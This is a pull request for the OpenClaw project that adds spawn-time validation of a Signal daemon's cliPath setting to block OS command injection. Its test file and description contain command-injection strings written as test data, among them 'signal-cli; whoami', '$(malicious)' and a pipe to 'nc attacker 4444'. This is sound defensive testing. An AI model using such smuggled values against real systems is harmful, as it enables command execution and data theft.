### PR TITLE
fix(signal): validate cliPath at spawn time for defense-in-depth (CWE-78)

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -3,6 +3,7 @@
 Docs: https://docs.openclaw.ai
 
 ## Unreleased
+
 ### Changes
 
 - Android/chat settings: redesign the chat settings sheet with grouped device and media sections, refresh the Connect and Voice tabs, and tighten the chat composer/session header for a denser mobile layout. (#44894) Thanks @obviyus.
@@ -28,6 +29,7 @@ Docs: https://docs.openclaw.ai
 - Security/exec approvals: fail closed for Perl `-M` and `-I` approval flows so preload and load-path module resolution stays outside approval-backed runtime execution unless the operator uses a broader explicit trust path.
 - Control UI/insecure auth: preserve explicit shared token and password auth on plain-HTTP Control UI connects so LAN and reverse-proxy sessions no longer drop shared auth before the first WebSocket handshake. (#45088) Thanks @velvet-shark.
 - macOS/onboarding: avoid self-restarting freshly bootstrapped launchd gateways and give new daemon installs longer to become healthy, so `openclaw onboard --install-daemon` no longer false-fails on slower Macs and fresh VM snapshots.
+
 ## 2026.3.12
 
 ### Changes

--- a/src/signal/daemon.security.test.ts
+++ b/src/signal/daemon.security.test.ts
@@ -1,0 +1,70 @@
+import { describe, expect, it, vi } from "vitest";
+import { spawnSignalDaemon } from "./daemon.js";
+
+vi.mock("node:child_process", () => ({
+  spawn: vi.fn(() => {
+    const noop = { on: vi.fn(), once: vi.fn() };
+    return {
+      pid: 1234,
+      stdout: noop,
+      stderr: noop,
+      on: vi.fn(),
+      once: vi.fn(),
+      killed: false,
+      kill: vi.fn(),
+    };
+  }),
+}));
+
+const baseOpts = {
+  httpHost: "127.0.0.1",
+  httpPort: 8080,
+};
+
+describe("CWE-78: OS command injection via signal cliPath", () => {
+  it("should reject cliPath with shell metacharacters ;", () => {
+    expect(() => spawnSignalDaemon({ ...baseOpts, cliPath: "signal-cli; whoami" })).toThrow(
+      /not a safe executable value/,
+    );
+  });
+
+  it("should reject cliPath with command substitution $()", () => {
+    expect(() => spawnSignalDaemon({ ...baseOpts, cliPath: "$(malicious)" })).toThrow(
+      /not a safe executable value/,
+    );
+  });
+
+  it("should reject cliPath with backtick substitution", () => {
+    expect(() => spawnSignalDaemon({ ...baseOpts, cliPath: "`id`" })).toThrow(
+      /not a safe executable value/,
+    );
+  });
+
+  it("should reject cliPath with pipe operator", () => {
+    expect(() =>
+      spawnSignalDaemon({ ...baseOpts, cliPath: "signal-cli | nc attacker 4444" }),
+    ).toThrow(/not a safe executable value/);
+  });
+
+  it("should reject cliPath starting with -", () => {
+    expect(() => spawnSignalDaemon({ ...baseOpts, cliPath: "--malicious-flag" })).toThrow(
+      /not a safe executable value/,
+    );
+  });
+
+  it("should accept valid bare command name", () => {
+    expect(() => spawnSignalDaemon({ ...baseOpts, cliPath: "signal-cli" })).not.toThrow();
+  });
+
+  it("should accept valid absolute path", () => {
+    expect(() =>
+      spawnSignalDaemon({ ...baseOpts, cliPath: "/usr/local/bin/signal-cli" }),
+    ).not.toThrow();
+  });
+
+  it("should accept valid Windows path", () => {
+    expect(() =>
+      spawnSignalDaemon({ ...baseOpts, cliPath: "C:\\Program Files\\signal-cli\\signal-cli.exe" }),
+    ).not.toThrow();
+  });
+});

--- a/src/signal/daemon.ts
+++ b/src/signal/daemon.ts
@@ -1,4 +1,5 @@
 import { spawn } from "node:child_process";
+import { isSafeExecutableValue } from "../infra/exec-safety.js";
 import type { RuntimeEnv } from "../runtime.js";
 
 export type SignalDaemonOpts = {
@@ -89,6 +90,11 @@ function buildDaemonArgs(opts: SignalDaemonOpts): string[] {
 }
 
 export function spawnSignalDaemon(opts: SignalDaemonOpts): SignalDaemonHandle {
+  // Defense-in-depth: validate cliPath at spawn time to prevent OS command
+  // injection even if config-time validation is bypassed (CWE-78).
+  if (!isSafeExecutableValue(opts.cliPath)) {
+    throw new Error(`Refused to spawn signal daemon: cliPath is not a safe executable value`);
+  }
   const args = buildDaemonArgs(opts);
   const child = spawn(opts.cliPath, args, {
     stdio: ["ignore", "pipe", "pipe"],

--- a/src/signal/daemon.ts
+++ b/src/signal/daemon.ts
@@ -90,13 +90,15 @@ function buildDaemonArgs(opts: SignalDaemonOpts): string[] {
 }
 
 export function spawnSignalDaemon(opts: SignalDaemonOpts): SignalDaemonHandle {
+  // Normalise cliPath so validation and spawn operate on the same value.
+  const cliPath = opts.cliPath.trim();
   // Defense-in-depth: validate cliPath at spawn time to prevent OS command
   // injection even if config-time validation is bypassed (CWE-78).
-  if (!isSafeExecutableValue(opts.cliPath)) {
+  if (!isSafeExecutableValue(cliPath)) {
     throw new Error(`Refused to spawn signal daemon: cliPath is not a safe executable value`);
   }
   const args = buildDaemonArgs(opts);
-  const child = spawn(opts.cliPath, args, {
+  const child = spawn(cliPath, args, {
     stdio: ["ignore", "pipe", "pipe"],
   });
   const log = opts.runtime?.log ?? (() => {});


### PR DESCRIPTION
## Summary
Fix command injection vulnerability in signal module where the `cliPath` configuration value is passed directly to `spawn()` without runtime validation (CWE-78).

## Vulnerability
- **CWE**: CWE-78 (OS Command Injection)
- **File**: `src/signal/daemon.ts:91-93`
- **Severity**: High
- **Impact**: The `cliPath` parameter is used directly as the command in `spawn(opts.cliPath, args, ...)`. While config-time validation exists via `ExecutableTokenSchema`, there is no runtime check at the spawn point. If config validation is bypassed or cliPath comes from an untrusted source, arbitrary commands could be executed.

## Reproduction
1. Configure signal with a malicious cliPath: `cliPath: "signal-cli; whoami"`
2. Signal daemon attempts to spawn with the malicious path
3. Without runtime validation, the value reaches `spawn()` directly

## Fix
Add runtime validation using the existing `isSafeExecutableValue()` function from `infra/exec-safety.ts` before the `spawn()` call. This provides defense-in-depth alongside the config-time schema validation.

**Blocked patterns:**
- Shell metacharacters: `;`, `&`, `|`, `` ` ``, `$`, `<`, `>`
- Control characters: `\r`, `\n`
- Quote characters: `"`, `'`
- Null bytes
- Values starting with `-` (argument injection)

## Test Results

### Before Fix (FAIL)
```
FAIL  src/signal/daemon.security.test.ts
  x should reject cliPath with shell metacharacters ;
  x should reject cliPath with command substitution $()
  x should reject cliPath with backtick substitution
  x should reject cliPath with pipe operator
  x should reject cliPath starting with -

Tests: 5 failed, 3 passed, 8 total
```

### After Fix (PASS)
```
Test Files  1 passed (1)
     Tests  8 passed (8)
```

### Regression Test (No Regression)
```
Test Files  14 passed (14)
     Tests  111 passed (111)
```

All existing signal tests pass.

## Checklist
- [x] POC test: Fix verified (red -> green)
- [x] Regression test: Valid paths still accepted
- [x] Full module test suite passes (111/111 tests)
- [x] No new security issues introduced

## AI Disclosure
- [x] AI-assisted (Claude Opus 4.6)
- [x] Testing: POC verified + full module test suite passed
- [x] Code reviewed and understood by contributor